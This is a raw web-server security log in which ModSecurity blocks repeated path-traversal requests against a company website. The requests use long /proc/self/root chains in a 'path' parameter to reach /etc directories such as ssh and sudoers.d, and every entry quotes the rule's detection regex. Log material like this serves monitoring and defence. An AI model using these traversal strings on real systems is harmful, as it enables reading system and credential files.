[Wed Mar 18 10:54:21.241566 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:46148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqujEzinOy1jxa1j4cXEgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:22.897697 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:46150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqujta6ubjKNq_cu4acBAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:25.305180 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:46160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqukcdf6f5d65gmYZTXYAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:26.610646 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:46168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqukgkwaGbbGflqUZASIwAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:29.027818 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:46184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqulew_le52K8_3pV3hqQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:32.530451 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:46080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqumNY0UrI5A3LftIyrSQAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:33.901601 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:46094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqumfu8EFLIOrSqIpsF1gAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:38.644367 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:46108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqunta6ubjKNq_cu4acFAAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:39.945896 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:47012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqun-oXxyEfFpUF8f9vRgAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:41.976885 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:47020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquoda6ubjKNq_cu4acFQAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:43.372223 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:47024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquo9a6ubjKNq_cu4acFwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:44.691191 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:47032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqupOyqAr6etmhZHNrCZAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:47.307056 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:47048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqupwkwaGbbGflqUZASKQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:49.819386 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:47050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquqeoXxyEfFpUF8f9vUAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:57.415328 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:45602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqusUzinOy1jxa1j4cXMAAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:54:58.763995 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:45610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqusvu8EFLIOrSqIpsF4QAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:00.178989 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:55578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqutEzinOy1jxa1j4cXMQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:01.501453 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.243.128:55594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqutSmAPhZkrhU8w4lvPwAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:04.233661 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:55604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquuAkwaGbbGflqUZASLwAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:06.753690 2026] [:error] [pid 29882:tid 140411716749056] [client 216.73.216.191:14266] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquuUzinOy1jxa1j4cXNQAAAQM"]
[Wed Mar 18 10:55:09.360948 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:55612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquvOoXxyEfFpUF8f9vXwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:10.986555 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:55972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquvtY0UrI5A3LftIyrdgAAAZU"], referer: 